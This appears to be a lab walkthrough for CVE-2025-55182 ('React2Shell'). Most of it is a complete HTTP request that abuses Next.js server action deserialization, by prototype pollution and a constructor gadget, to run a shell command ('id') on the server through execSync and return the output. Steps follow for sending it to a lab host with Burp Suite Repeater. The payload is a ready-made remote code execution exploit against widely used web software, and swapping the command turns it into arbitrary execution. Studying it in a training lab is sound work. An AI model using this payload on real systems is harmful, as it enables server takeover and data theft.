# React2Shell: CVE-2025-55182

```
POST / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0
Next-Action: x
X-Nextjs-Request-Id: b5dce965
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryx8jO2oVc6SWP3Sad
X-Nextjs-Html-Request-Id: SSTMXm7OJ_g0Ncx6jpQt9
Content-Length: 740

------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="0"

{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('id',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {
      "get": "$1:constructor:constructor"
    }
  }
}
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="1"

"$@0"
------WebKitFormBoundaryx8jO2oVc6SWP3Sad
Content-Disposition: form-data; name="2"

[]
------WebKitFormBoundaryx8jO2oVc6SWP3Sad--
```

As you have learned through the previous tasks, you can spot from `execSync('id'...` that `id` will be executed on the remote server. Moreover, knowing that this payload will return the command output back to us in the server’s response.

### Sending the Payload via Burp Suite

After you start Burp Suite, you will need to go to the **Repeater** tab. Then click on the “+” button under **Repeater** and choose **New HTTP tab** as shown in the image below.

![](https://1856124319-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7Q04kikCQP9iY2r48j9z%2Fuploads%2FUu2Pqr111GRxuCC91EeM%2Fimage.png?alt=media\&token=14141bfe-136c-48f4-9d1d-abb19094cf7e)<br>

Then paste the above payload verbatim in the Request tab as shown below.

<figure><img src="https://1856124319-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7Q04kikCQP9iY2r48j9z%2Fuploads%2Fluu8ixnRNmTRah9ZaEmR%2Fimage.png?alt=media&#x26;token=a7db7d19-4da9-477d-bc95-8dce19f7b43b" alt=""><figcaption></figcaption></figure>

Before we can click the Send button and deliver the payload to the vulnerable server, we still need to specify our target server. Click on Target: Not specified to specify the target.

<figure><img src="https://1856124319-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7Q04kikCQP9iY2r48j9z%2Fuploads%2FLAG5okba5SavzcXF62mQ%2Fimage.png?alt=media&#x26;token=0b24f4e6-6c82-452d-97aa-6550640dbb1b" alt=""><figcaption></figcaption></figure>

We need to use the following settings:

* Host: `10.48.156.55`
* Port: `3000`
* Note: Our server does **not** use HTTPS, so keep the **Use HTTPS** checkbox clear

<figure><img src="https://1856124319-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7Q04kikCQP9iY2r48j9z%2Fuploads%2FBmvneY1EarizCtmfWpL7%2Fimage.png?alt=media&#x26;token=b1f19dbe-35fd-461f-a798-c868dda55a4a" alt=""><figcaption></figcaption></figure>

Now we are ready to experiment with sending commands to the target\
server and check the output in the server response. In the screenshot\
below, you can see the server’s output for running the id command.

<figure><img src="https://1856124319-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F7Q04kikCQP9iY2r48j9z%2Fuploads%2Fc6k9xgNCdi7jqwoowKkh%2Fimage.png?alt=media&#x26;token=a4e5fc3a-db22-4e8a-a72d-5174457106f0" alt=""><figcaption></figcaption></figure>